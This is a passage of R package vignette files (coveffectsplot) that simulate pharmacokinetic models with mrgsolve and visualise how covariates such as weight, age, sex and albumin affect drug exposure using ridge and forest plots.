SEX = c(rep(0,nsubj/2),rep(1,nsubj/2))
)
ev1 <- ev(time = 0, amt = 100, cmt = 1)
data.dose <- ev(ev1)
data.dose <- setDT(as.data.frame(data.dose))
data.all <- data.table(idata, data.dose)
set.seed(678549)
outputsim <- pedmodsim %>%
data_set(data.all) %>%
mrgsim(end = 24, delta = 0.25)%>%
as.data.frame %>%
as.data.table
outputsim$SEX <- as.factor(outputsim$SEX)
outputsim$SEX <- factor(outputsim$SEX, labels=c("Girls","Boys"))
p1 <- ggplot(data = outputsim[outputsim$SEX=="Girls",],
aes(time, CP, group = ID)) +
geom_line(alpha = 0.2, size = 0.1) +
facet_grid(AGE ~ WT+SEX,
labeller = label_both) +
scale_y_log10() +
labs(y = expression(Log[10]~~Plasma~~Concentrations), color = "Sex", x = "Time (h)")
p1
```
## PK Parameters and Associated BSV ranges
* Second we compute the PK parameters AUC and Cmax, standardize and compute between subject variability ranges.
```{r ncapedpkmodel, collapse=TRUE }
derive.exposure <- function(time, CP) {
n <- length(time)
x <- c(
Cmax = max(CP),
AUC = sum(diff(time) * (CP[-1] + CP[-n])) / 2
)
data.table(paramname=names(x), paramvalue=x)
}
refbsv <- outputsim[, derive.exposure(time, CP), by=.(ID, WT, SEX, AGE)]
refbsv[, stdparamvalue := paramvalue/median(paramvalue), by=list(SEX,paramname)]
bsvranges <- refbsv[,list(
P05 = quantile(stdparamvalue, 0.05),
P25 = quantile(stdparamvalue, 0.25),
P50 = quantile(stdparamvalue, 0.5),
P75 = quantile(stdparamvalue, 0.75),
P95 = quantile(stdparamvalue, 0.95)), by = list(SEX,paramname)]
bsvranges
yvar_names <- c(
'AUC'="AUC",
'Cmax'="Cmax"
)
p4 <- ggplot(refbsv[SEX=="Girls",], aes(
x = stdparamvalue,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_grid(paramname+AGE~WT+SEX , scales="free_y",
labeller=labeller(paramname=yvar_names,
.cols =label_both,
AGE = label_both)
,switch="y")+
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name="Probability",
values=c("white", "#FF000050", "#FF0000A0",
"#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw() +
theme(
legend.position = "none",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank()) +
labs(x="Standardized PK Parameters", y="") +
scale_x_log10() +
coord_cartesian(expand=FALSE)
p4
```
```{r ped2, fig.width=7,fig.height=4, include=FALSE }
# p1<- p1 +theme_bw(base_size=18)
# p4 <- p4+ theme_bw(base_size=18)+
# theme(axis.text.y=element_blank(),axis.ticks.y = element_blank(),
# legend.position = "none")
# (p1 + p4)
#
# ggsave("Figure_7_1.png", device="png",type="cairo-png",
# dpi=125, width =9 ,height=4)
```
## Simulating Age/Weight Pairs Using NHANES LMS Values
The NHANES website provides a csv file containing the smoothed growth charts distribution parameters at specific ages for boys and girls. The `gamlss.dist::rBCCG` function is used to show how we can use these parameters to generate a realistic pediatric Age/Weight/Sex distribution.
```{r simcovariate, collapse=TRUE }
wtage <- read.csv (url("https://www.cdc.gov/growthcharts/data/zscore/wtage.csv"))
#boys 1 and girls 2 in this file
wtage<- wtage[wtage$Agemos<=6*12,] # keeps only 2 to 6 years
wtage[wtage$Agemos>=4*12-1&wtage$Agemos<=4*12 +1,] %>%
group_by(Sex) %>%
summarize(Median=median(M))
nweightsperage <- 50 # simulate 50 kid at each age/sex
simwtageoutput <- data.frame(matrix(NA, nrow = nrow(wtage),ncol = nweightsperage))
names(simwtageoutput) <- paste0("Var", 1:nweightsperage)
set.seed(209321)
for (i in 1:nrow(wtage)) {#
simpoints <- gamlss.dist::rBCCG(nweightsperage,
mu = wtage[i,"M"],
sigma = wtage[i,"S"],
nu = wtage[i,"L"])
simwtageoutput[i, ] <- simpoints
}
simwtageoutput$Agemos <- wtage$Agemos
simwtageoutput$AgeY <- wtage$Agemos/12
simwtageoutput$Sex <- ifelse( wtage$Sex==2,0,1)#recode girls to 0, boys to 1
simwtageoutput <- tidyr::gather(simwtageoutput,age,Weight,
paste0("Var", 1:nweightsperage))
simwtageoutput$age <- NULL
simwtageoutput$SEXLABEL <- factor(simwtageoutput$Sex,labels=c("Girls","Boys"))
wtvsageplot<- ggplot(simwtageoutput,aes(AgeY,Weight,color=SEXLABEL))+
geom_point(alpha=0.2,size=1.5)+
facet_grid(~SEXLABEL)+
labs(y="Weight (kg)", x= "Age (years)",col="")
wtvsageplot
```
## Simulation with the Multivariate Realistic Distribution
The section above generated 4900 Age/Weight/Sex distribution values that we will use for the simulation. We will remove the between subject variability to focus on the covariate effects. We show a plot of the PK profiles and the normalized PK parameters versus Age and versus Weight.
```{r simcovariatemodelpk,fig.height=6, collapse=TRUE }
idata <- as.data.frame(simwtageoutput)
names(idata) <- c("Agemos","AGE","SEX","WT","SEXLABEL")
ev1 <- ev(time=0,amt=100, cmt=1)
data.dose <- ev(ev1)
data.dose<-as.data.frame(data.dose)
data.all<-merge(idata,data.dose)
data.all$ID <- 1: nrow(data.all)
outcovcomb<- pedmodsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(end=24, delta=1)
outcovcomb<-as.data.frame(outcovcomb)
outcovcomb <- outcovcomb %>%
arrange(ID,time,SEX,AGE,WT)
outcovcomb$SEX <- as.factor(outcovcomb$SEX)
outcovcomb$SEX <- factor(outcovcomb$SEX,labels=c("Girls","Boys"))
f <- function(x, xcat, which, what, from, to, ...) {
what <- sub("of ", "of\n", what)
what <- sub("median ", "median\n", what)
sprintf("%s %s [%s to %s[",
which, what, signif_pad(from, 3, FALSE), signif_pad(to, 3, FALSE))
}
p3 <- ggplot(data =outcovcomb ,
aes(time, CP, group = ID,color=SEX)) +
geom_line(alpha = 0.1, size = 0.3) +
facet_grid( table1::eqcut(AGE,2,f) ~ table1::eqcut(WT,4,f) ) +
labs(y = "Plasma Concentrations", color = "Sex", x = "Time (h)")+
theme(strip.placement = "outside",legend.position =c(0.9,0.2),
legend.background = element_blank())+
guides(colour=guide_legend(override.aes = list(alpha=1,size=0.5)))
p3
```
```{r simcovariatemodelpkparam, collapse=TRUE }
out.df.multivariatecov <- as.data.frame(outcovcomb) %>%
arrange(ID,time) %>%
group_by(ID,SEX,AGE,WT)%>%
summarise (Cmax = max(CP,na.rm = TRUE),
AUC= sum(diff(time ) *na.omit(lead(CP) + CP)) / 2)
out.df.multivariatecov.long <- out.df.multivariatecov %>%
gather(paramname,paramvalue,Cmax,AUC) %>%
group_by (paramname,SEX) %>%
mutate(medparam = median(paramvalue),
paramvalue = paramvalue / medparam)
out.df.multivariatecov.long$SEXLABEL <- factor(out.df.multivariatecov.long$SEX,labels=c("Girls","Boys"))
paramvsage <- ggplot(out.df.multivariatecov.long,
aes( AGE,paramvalue,col=SEXLABEL) )+
geom_point(alpha=0.1,size=2)+
facet_grid(paramname~SEXLABEL,labeller = label_value,
scales="free_y")+
labs(y="Standardized PK Parameter Values",x="Age (years)",color="")
paramvsage
paramvswt <- ggplot(out.df.multivariatecov.long,
aes( WT,paramvalue,col=factor(SEXLABEL)) )+
geom_point(alpha=0.1,size=2)+
facet_grid(paramname~SEXLABEL,labeller = label_value,
scales="free_y")+
labs(y="Standardized PK Parameter Values",x="Weight (kg)",color="")
paramvswt
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# p3 <- p3+ theme_bw(base_size = 18)+
# theme(strip.placement = "outside",legend.position =c(0.9,0.2),
# legend.background = element_blank())+
# guides(colour=guide_legend(override.aes = list(alpha=1,size=0.5)))
#
# wtvsageplot2<- wtvsageplot +theme_bw(base_size=18) + facet_grid(SEXLABEL~.,switch="y")+theme(legend.position = "none")
# png("Figure_7_2.png", type="cairo-png",width= 2*7*72, height =5*72)
# egg::ggarrange(wtvsageplot2 ,p3,widths = c(1,3),ncol=2)
# dev.off()
#
# wtvsageplot<- wtvsageplot +theme_bw(base_size=18)+theme(legend.position = "none")
# wtvsageplot
# ggsave("Figure_6_1.png", device="png",type="cairo-png",
# width= 6, height = 5,dpi=72)
#
# paramvsage<- paramvsage+theme_bw(base_size=18)+theme(legend.position = "none")
# paramvswt<- paramvswt+theme_bw(base_size=18)+theme(legend.position = "none")
# (paramvswt/paramvsage)
# ggsave("Figure_6_2.png", device="png",type="cairo-png",width= 6, height = 9,dpi=72)
```
## PK Parameters Summaries and Distribution Plots
```{r computenca, fig.height=5, collapse=TRUE }
nca.summaries <- out.df.multivariatecov.long %>%
mutate(SEXCAT =ifelse( SEX=="Boys","Girls","Boys"),
REF = "All Subjects")
nca.summaries$WTCAT3 <- table1::eqcut( nca.summaries$WT,3,varlabel = "Weight")
nca.summaries$WTCAT4 <- table1::eqcut( nca.summaries$WT,4,varlabel = "Weight")
nca.summaries$AGECAT4 <- table1::eqcut( nca.summaries$AGE,4,varlabel = "Age")
nca.summaries.long <- gather(nca.summaries,
covname,
covvalue,REF,WTCAT3,WTCAT4,AGECAT4,SEXCAT,
factor_key = TRUE)
nca.summaries.long$covvalue <- as.factor( nca.summaries.long$covvalue)
nca.summaries.long$covvalue <- reorder(nca.summaries.long$covvalue,nca.summaries.long$paramvalue)
ggridgesplot<- ggplot(nca.summaries.long,
aes(x=paramvalue,y=covvalue,fill=factor(..quantile..),height=..ndensity..))+
facet_grid(covname~paramname,scales="free_y")+
annotate("rect",
xmin = 0.8,
xmax = 1.25,
ymin = -Inf,
ymax = Inf,
fill = "gray",
alpha = 0.4) +
stat_density_ridges(
geom = "density_ridges_gradient", calc_ecdf = TRUE,
quantile_lines = TRUE, rel_min_height = 0.01,scale=0.9,
quantiles = c(0.05,0.5, 0.95))+
scale_fill_manual(
name = "Probability", values = c("white","#0000FFA0", "#0000FFA0", "white"),
labels = c("(0, 0.05]", "(0.05, 0.5]","(0.5, 0.95]", "(0.95, 1]")
)+
geom_vline(data=data.frame (xintercept=1), aes(xintercept =xintercept ),size = 1)+
theme_bw()+
labs(x="Effects Of Covariates on PK Parameter",y="")
ggridgesplot
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# ggridgesplot+theme(legend.position = "none")
# ggsave("Figure_7_3.png", device="png",type="cairo-png",width= 7.8, height = 6,dpi=72)
```
## A Forest Plot with a Side Table
Similarly to previous sections, we prepare the data to use `forest_plot`. We provide a two parameters plot illustrating some of the options.
```{r simcovariate2, collapse=TRUE }
coveffectsdatacovrep <- nca.summaries.long %>%
dplyr::group_by(paramname,covname,covvalue) %>%
dplyr::summarize(
mid= median(paramvalue),
lower= quantile(paramvalue,0.05),
upper = quantile(paramvalue,0.95)) %>%
dplyr::filter(!is.na(mid)) %>%
dplyr::filter(covname !="WTCAT3")
bsvranges <- bsvranges[SEX=="Girls",]
setkey(bsvranges, paramname)
coveffectsdatacovrepbsv <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv$covname <- "BSV"
coveffectsdatacovrepbsv$covvalue <- "90% of patients"
coveffectsdatacovrepbsv$label <- "90% of patients"
coveffectsdatacovrepbsv$lower <- bsvranges$P05
coveffectsdatacovrepbsv$upper <- bsvranges$P95
coveffectsdatacovrepbsv2 <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv2$covname <- "BSV"
coveffectsdatacovrepbsv2$covvalue <- "50% of patients"
coveffectsdatacovrepbsv2$label <- "50% of patients"
coveffectsdatacovrepbsv2$lower <- bsvranges$P25
coveffectsdatacovrepbsv2$upper <- bsvranges$P75
coveffectsdatacovrepbsv<- rbind(coveffectsdatacovrep,coveffectsdatacovrepbsv2,
coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv <- coveffectsdatacovrepbsv %>%
mutate(
label= covvalue,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
coveffectsdatacovrepbsv<- as.data.frame(coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv$label <- gsub(": ", ":\n", coveffectsdatacovrepbsv$label)
coveffectsdatacovrepbsv$covname <-factor(as.factor(coveffectsdatacovrepbsv$covname ),
levels = c("WTCAT4","AGECAT4","SEXCAT","REF", "BSV"),
labels = c("Weight","Age","Sex","REF","BSV"))
coveffectsdatacovrepbsv$label <- factor(coveffectsdatacovrepbsv$label,
levels =c(
"1st quartile of Age:\n[2.00,2.96)"
, "2nd quartile of Age:\n[2.96,3.96)"
, "3rd quartile of Age:\n[3.96,4.96)"
, "4th quartile of Age:\n[4.96,5.96]"
, "Boys", "Girls", "All Subjects","90% of patients","50% of patients"
, "1st quartile of Weight:\n[9.40,13.9)"
, "2nd quartile of Weight:\n[13.9,15.9)"
, "3rd quartile of Weight:\n[15.9,18.3)"
, "4th quartile of Weight:\n[18.3,38.2]"
))
interval_legend_text = "Median (points)\n90% CI (horizontal lines)"
interval_bsv_text = "BSV (points)\nPrediction Intervals (horizontal lines)"
ref_legend_text = "Reference (vertical line)\nClinically relevant limits\n(gray area)"
png("./Figure_7_4.png",width = 11 ,height = 7,units = "in",res=72)
coveffectsplot::forest_plot(coveffectsdatacovrepbsv,
ref_area = c(0.8, 1/0.8),
x_range = c(0.4,2.2),
strip_placement = "outside",
base_size = 18,
y_label_text_size = 10,x_label_text_size = 10,
xlabel = "Fold Change Relative to Reference",
ref_legend_text =ref_legend_text,
area_legend_text =ref_legend_text ,
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_formula = "covname~paramname",
facet_switch = "both",table_facet_switch = "both",
reserve_table_xaxis_label_space = TRUE,
facet_scales = "free_y", facet_space = "free",
paramname_shape = FALSE,
table_position = "right",
table_text_size=3,
plot_table_ratio = 1.5,
show_table_facet_strip = "x",
logxscale = TRUE,
major_x_ticks = c(0.5,0.8,1/0.8,1/0.5),
return_list = FALSE)
dev.off()
```
<file_sep>/cran-comments.md
## Test environments
* local Windows 10 install, R 3.6.3
* ubuntu 16.04.6 LTS (on travis-ci), R 3.6.3
* win-builder (devel and release)
## R CMD check results
0 errors | 0 warnings | 0 note
* This is to add back two vignettes and code generation
* some Notes from the previous builds on some platforms are false positives since these are used in the shiny app code and are required for it.
## Reverse dependencies
There is no listed dependencies.
---<file_sep>/vignettes/PK_Example.Rmd
---
title: "PK Model: Assessing the Impact of Covariates on Drug Exposure"
output:
rmarkdown::html_vignette:
toc: true
df_print: kable
vignette: >
%\VignetteIndexEntry{PK_Example}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
warning =FALSE,
message =FALSE,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(mrgsolve)
library(ggplot2)
library(ggstance)
library(ggridges)
library(tidyr)
library(dplyr)
library(table1)
library(patchwork)
library(egg)
library(data.table)
theme_set(theme_bw())
#utility function to simulate varying one covariate at a time keeping the rest at the reference
expand.modelframe <- function(..., rv, covcol="covname") {
args <- list(...)
df <- lapply(args, function(x) x[[1]])
df[names(rv)] <- rv
res <- lapply(seq_along(rv), function(i) {
df[[covcol]] <- names(rv)[i]
df[[names(rv)[i]]] <- args[[names(rv)[i]]]
as.data.frame(df)
})
do.call(rbind, res)
}
nbsvsubjects <- 1000
nsim <- 100 # uncertainty replicates for vignette you might want a higher number
round_pad <- function(x, digits = 2, round5up = TRUE) {
eps <- if (round5up) x * (10^(-(digits + 3))) else 0
formatC(round(x + eps, digits), digits = digits, format = "f", flag = "0")
}
```
Here we illustrate the approach with a two-compartment PK model defined with an ordinary differential equation (ODE) and covariates on the PK parameters Clearance (CL) and Volume (V). Weight, Albumin and Sex had effects on CL while Weight and Sex had effects on V. For simplicity no covariates had effects on peripheral clearance or volume. The approach is general and simulation based and can be easily extended to any ODE model with multiple covariate effects.
## Specifying a PK Model using `mrgsolve`
```{r pkmodel, collapse=TRUE }
codepkmodelcov <- '
$PARAM @annotated
KA : 0.5 : Absorption rate constant Ka (1/h)
CL : 4 : Clearance CL (L/h)
V : 10 : Central volume Vc (L)
Vp : 50 : Peripheral volume Vp (L)
Qp : 10 : Intercompartmental clearance Q (L/h)
CLALB : -0.8 : Ablumin on CL (ref. 45 g/L)
CLSEX : 0.2 : Sex on CL (ref. Female)
CLWT : 1 : Weight on CL (ref. 85 kg)
VSEX : 0.07 : Sex on Vc (ref. Female)
VWT : 1 : Weight on Vc (ref. 85 kg)
$PARAM @annotated // reference values for covariate
WT : 85 : Weight (kg)
SEX : 0 : Sex (0=Female, 1=Male)
ALB : 45 : Albumin (g/L)
$PKMODEL cmt="GUT CENT PER", depot=TRUE, trans=11
$MAIN
double CLi = CL *
pow((ALB/45.0), CLALB)*
(SEX == 1.0 ? (1.0+CLSEX) : 1.0)*
pow((WT/85.0), CLWT)*exp(nCL);
double V2i = V *
(SEX == 1.0 ? (1.0+VSEX) : 1.0)*
pow((WT/85.0), VWT)*exp(nVC);
double KAi = KA;
double V3i = Vp *pow((WT/85.0), 1);
double Qi = Qp *pow((WT/85.0), 0.75);
$OMEGA @annotated @block
nCL : 0.09 : ETA on CL
nVC : 0.01 0.09 : ETA on Vc
$TABLE
double CP = CENT/V2i;
$CAPTURE CP KAi CLi V2i V3i Qi WT SEX ALB
'
modcovsim <- mcode("codepkmodelcov", codepkmodelcov)
partab <- setDT(modcovsim@annot$data)[block=="PARAM", .(name, descr, unit)]
partab <- merge(partab, melt(setDT(modcovsim@param@data), meas=patterns("*"), var="name"))
knitr::kable(partab)
```
### Simulate a Reference Subjects with BSV
We simulate the reference subject having the reference covariate values defined in the model which are:
Weight = 85 kg, Sex = Female and Albumin = 45 g/L.
We also keep the between subject variability (BSV) to illustrate its effects on the concentration-time profiles on linear and log linear scales.
```{r pksimulation, fig.width=7, message=FALSE }
idata <- data.table(ID=1:nbsvsubjects, WT=85, SEX=0, ALB=45)
ev1 <- ev(time = 0, amt = 100, cmt = 1)
data.dose <- ev(ev1)
data.dose <- setDT(as.data.frame(data.dose))
data.all <- data.table(idata, data.dose)
outputsim <- modcovsim %>%
data_set(data.all) %>%
mrgsim(end = 24, delta = 0.25) %>%
as.data.frame %>%
as.data.table
outputsim$SEX <- factor(outputsim$SEX, labels="Female")
# Only plot a random sample of N=500
set.seed(678549)
plotdata <- outputsim[ID %in% sample(unique(ID), 500)]
p1 <- ggplot(plotdata, aes(time, CP, group = ID)) +
geom_line(alpha = 0.2, size = 0.1) +
facet_grid(ALB ~ WT + SEX, labeller = label_both) +
labs(y = "Plasma Concentrations", x = "Time (h)")
p2 <- ggplot(plotdata, aes(time, CP, group = ID)) +
geom_line(alpha = 0.2, size = 0.1) +
facet_grid(ALB ~ WT + SEX, labeller = label_both) +
scale_y_log10() +
labs(y = expression(Log[10]~Plasma~Concentrations), x = "Time (h)")
p1+p2
```
### Compute PK Parameters, Plot and Summarize BSV
In this section we compute the PK parameters of interest, provide a plot of the parameters as well as of the standardized ones. We also summarize and report the BSV as ranges of 50 and 90% of patients for each PK parameter.
```{r computenca , fig.width=7 , message=FALSE }
derive.exposure <- function(time, CP) {
n <- length(time)
x <- c(
Cmax = max(CP),
Clast = CP[n],
AUC = sum(diff(time) * (CP[-1] + CP[-n])) / 2
)
data.table(paramname=names(x), paramvalue=x)
}
refbsv <- outputsim[, derive.exposure(time, CP), by=.(ID, WT, SEX, ALB)]
p3 <- ggplot(refbsv, aes(
x = paramvalue,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_wrap(~ paramname, scales="free", ncol=1) +
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name = "Probability",
values = c("white", "#FF000050", "#FF0000A0", "#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw() +
theme(
legend.position = "none",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank()) +
labs(x="PK Parameters", y="") +
scale_x_log10() +
coord_cartesian(expand=FALSE)
# Obtain the standardized parameter value by dividing by the median.
refbsv[, stdparamvalue := paramvalue/median(paramvalue), by=paramname]
p4 <- ggplot(refbsv, aes(
x = stdparamvalue,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_wrap(~ paramname, scales="free_y", ncol=1) +
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name="Probability",
values=c("white", "#FF000050", "#FF0000A0", "#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw() +
theme(
legend.position = "none",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank()) +
labs(x="Standardized PK Parameters", y="") +
scale_x_log10() +
coord_cartesian(expand=FALSE)
p3+p4
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# p2<- p2 + theme_bw(base_size=18)
#
# p3<- p3+theme_bw(base_size=18) +
# theme(
# axis.title.x =element_text(size=12),
# legend.position = "none",
# strip.background = element_blank(),
# strip.text = element_blank(),
# plot.margin = margin(0,0,0,0))+
# xlab("Reference Subject\nPK Parameters with BSV")
# p4 <- p4+theme_bw(base_size=18) +
# theme(
# axis.title.x =element_text(size=12),
# axis.text.y = element_blank(),
# axis.ticks.y = element_blank(),
# legend.position = "none",
# strip.background = element_blank(),
# strip.text = element_blank(),
# panel.spacing = unit(10,"mm"),
# plot.margin = margin(0,0,0,0))+
# xlab("Reference Subject\nStandardized PK Parameters")
# (p2 + p3 +p4)
#
# ggsave("Figure_4_1.png", device="png",type="cairo-png",
# dpi=125, width =9 ,height=4)
```
**Ranges of BSV for each PK Parameter:**
```{r computebsvpk , fig.width=7 , message=FALSE }
bsvranges <- refbsv[,list(
P05 = quantile(stdparamvalue, 0.05),
P25 = quantile(stdparamvalue, 0.25),
P50 = quantile(stdparamvalue, 0.5),
P75 = quantile(stdparamvalue, 0.75),
P95 = quantile(stdparamvalue, 0.95)), by = paramname]
bsvranges
```
## Generate and Simulate at Combinations of Covariate of Interest
Based on our observed covariate data, we compute percentiles of interest that we will use to simulate data at. Common practice is to compute the 5,25,75,95 percentiles (the median being the reference). In some cases, we might want to explore the min, max or other extreme case scenarios. Care should be taken as this approach might generate unrealistic combination of covariates that can never appear in a real patient. The utility function expand.modelframe (written by <NAME>) is defined in the setup section of the vignette and can be found in the source code. It facilitates the creation of a set of covariate values varying one at a time.
**Dataframe Holding Combinations of Covariates:**
```{r covcomb , fig.width=7 }
reference.values <- data.frame(WT = 85, ALB = 45, SEX = 0)
covcomb <- expand.modelframe(
WT = c(56, 72, 98, 128), # P05, P25, P50, P75, P95
ALB = c(40, 50), # P05, P50, P95
SEX = c(1), # Reference is for SEX=0 (female)
rv = reference.values)
# Add the reference
covcomb <- rbind(covcomb, data.table(reference.values, covname="REF"))
covcomb$ID <- 1:nrow(covcomb)
covcomb
```
### Simulation at Unique Combinations of Covariates
As a first step, we simulate without uncertainty and without BSV using `zero_re()` at unique combination of covariates and provide a plot to visualize the effects.
```{r, fig.width=7 ,message=FALSE}
idata <- data.table::copy(covcomb)
idata$covname <- NULL
ev1 <- ev(time=0, amt=100, cmt=1)
data.dose <- as.data.frame(ev1)
data.all <- data.table(idata, data.dose)
outcovcomb<- modcovsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(end=24, delta=0.25) %>%
as.data.frame %>%
as.data.table
outcovcomb$SEX <- factor(outcovcomb$SEX, labels=c("Female", "Male"))
ggplot(outcovcomb, aes(x=time, y=CP, col=factor(WT), linetype=SEX)) +
geom_line(aes(group=ID), alpha=1, size=1.5) +
facet_grid(ALB ~ WT, labeller=label_both) +
labs(
x = "Time (h)",
y = "Plasma Concentrations",
linetype = "Sex",
colour = "Weight",
caption = "Simulation without Uncertainty\nwithout BSV") +
coord_cartesian(ylim=c(0,3.5))
```
### Adding Uncertainty from a Varcov Matrix
* First, we will invent a varcov matrix by assuming 15% relative standard errors and correlations of 0.2 across the board. We then simulate a 100 set of parameters using a multivariate normal (kept at 100 for the vignette, use more replicates for a real project). Also, unless the model was written in a way to allow unconstrained parameter values, care should be taken to make sure the simulated parameters are valid and make sense. When available, use the set of parameters from a bootstrap run.
**Variance Covariance Matrix of fixed effects:**
```{r, fig.width=7}
theta <- unclass(as.list(param(modcovsim)))
theta[c("WT", "SEX", "ALB")] <- NULL
theta <- unlist(theta)
as.data.frame(t(theta))
cor2cov <- function (cor, sd)
{
if (missing(sd)) {
sd <- diag(cor)
}
diag(cor) <- 1
n <- nrow(cor)
diag(sd, n) %*% cor %*% diag(sd, n)
}
varcov <- cor2cov(
matrix(0.2, nrow=length(theta), ncol=length(theta)),
sd=theta*0.15)
rownames(varcov) <- colnames(varcov) <- names(theta)
as.data.frame(varcov)
```
### Generating Sets of Parameters with Uncertainty
* Second, we generate the sim_parameters dataset using `mvrnorm` and then incorporate the uncertainty by simulating using a different set of parameters (row) for each replicate.
**First Few Rows of a Dataset Containing Simulated Fixed Effects with Uncertainty:**
```{r, fig.width=7}
set.seed(678549)
# mvtnorm::rmvnorm is another option that can be explored
sim_parameters <- MASS::mvrnorm(nsim, theta, varcov, empirical=T) %>% as.data.table
head(sim_parameters)
```
### Iterative Simulation to Apply the Uncertainty
* Third, we illustrate how you can iterate over a set of parameters value using a `for` loop. We then overlay the previous simulation results without uncertainty on the one with uncertainty to visualize the effect of adding it.
```{r, fig.width=7,fig.height=4}
idata <- data.table::copy(covcomb)
idata$covname <- NULL
ev1 <- ev(time=0, amt=100, cmt=1)
data.dose <- as.data.frame(ev1)
iter_sims <- NULL
for(i in 1:nsim) {
data.all <- data.table(idata, data.dose, sim_parameters[i])
out <- modcovsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(start=0, end=24, delta=0.25) %>%
as.data.frame %>%
as.data.table
out[, rep := i]
iter_sims <- rbind(iter_sims, out)
}
iter_sims$SEX <- factor(iter_sims$SEX, labels = c("Female", "Male"))
pkprofileuncertainty<- ggplot(iter_sims, aes(x=time, y=CP, col=factor(WT), linetype=SEX)) +
geom_line(aes(group=interaction(ID, rep)), alpha=0.1, size=0.1) +
geom_line(data = outcovcomb, aes(group=interaction(ID)),
alpha= 1, size=0.7, colour = "black") +
facet_grid(ALB ~ WT, labeller=label_both) +
labs(
x = "Time (h)",
y = "Plasma Concentrations",
linetype = "No Uncertainty\nSex",
colour = "Uncertainty\nReplicates\nWeight",
caption = "Simulation with Uncertainty\nwithout BSV") +
coord_cartesian(ylim=c(0,3.5))+
guides(colour = guide_legend(override.aes = list(alpha = 1)))
pkprofileuncertainty
```
### Compute PK Parameters and Boxplots
Similar to an earlier section, we compute the PK parameters by patient and by replicate standardize by the computed median for reference subject and provide a plot. We add some data manipulation to construct more informative labels that will help in the plotting.
```{r, fig.width=7, include=FALSE, message=FALSE}
out.df.univariatecov.nca <- iter_sims[, derive.exposure(time, CP), by=.(rep, ID, WT, SEX, ALB)]
out.df.univariatecov.nca
refvalues <- out.df.univariatecov.nca[
ALB==45 & WT==85 & SEX=="Female",
.(medparam = median(paramvalue)), by=paramname]
data.frame(refvalues)
```
**Median Parameter Values for the Reference:**
```{r, fig.width=7,fig.height=5 ,message=FALSE}
covcomb$covvalue[covcomb$covname=="WT"] <- paste(covcomb$WT[covcomb$covname=="WT"],"kg")
covcomb$covvalue[covcomb$covname=="ALB"] <- paste(covcomb$ALB[covcomb$covname=="ALB"],"g/L")
covcomb$covvalue[covcomb$covname=="SEX"] <- "Male"
covcomb$covvalue[covcomb$covname=="REF"] <- "85 kg\nFemale\n45 g/L"
#covcomb[covname=="REF", covvalue := "85 kg Female 45 g/L"]
covcomb <- as.data.table(covcomb)
out.df.univariatecov.nca <- merge(
out.df.univariatecov.nca,
covcomb[, list(ID, covname, covvalue)]
)
setkey(out.df.univariatecov.nca, paramname)
out.df.univariatecov.nca <- merge(
out.df.univariatecov.nca,
refvalues)
out.df.univariatecov.nca[, paramvaluestd := paramvalue/medparam]
boxplotdat <- out.df.univariatecov.nca[covname!="REF"]
boxplotdat[covname=="WT", covname2 := "Weight"]
boxplotdat[covname=="ALB", covname2 := "Albumin"]
boxplotdat[covname=="SEX", covname2 := "Sex"]
boxplotdatREFWT <- out.df.univariatecov.nca[covname=="REF"]
boxplotdatREFWT[, covname2 := "Weight"]
boxplotdatREFWT[, covvalue := covcomb[covname=="REF", covvalue]]
boxplotdatREFSEX <- out.df.univariatecov.nca[covname=="REF"]
boxplotdatREFSEX[, covname2 := "Sex"]
boxplotdatREFSEX[, covvalue := covcomb[covname=="REF", covvalue]]
boxplotdatREFALB <- out.df.univariatecov.nca[covname=="REF"]
boxplotdatREFALB[, covname2 := "Albumin"]
boxplotdatREFALB[, covvalue := covcomb[covname=="REF", covvalue]]
boxplotdat <- rbind(
boxplotdat,
boxplotdatREFWT,
boxplotdatREFSEX,
boxplotdatREFALB)
boxplotdat[paramname=="AUC", paramname2 := "AUC"]
boxplotdat[paramname=="Clast", paramname2 := "C[last]"]
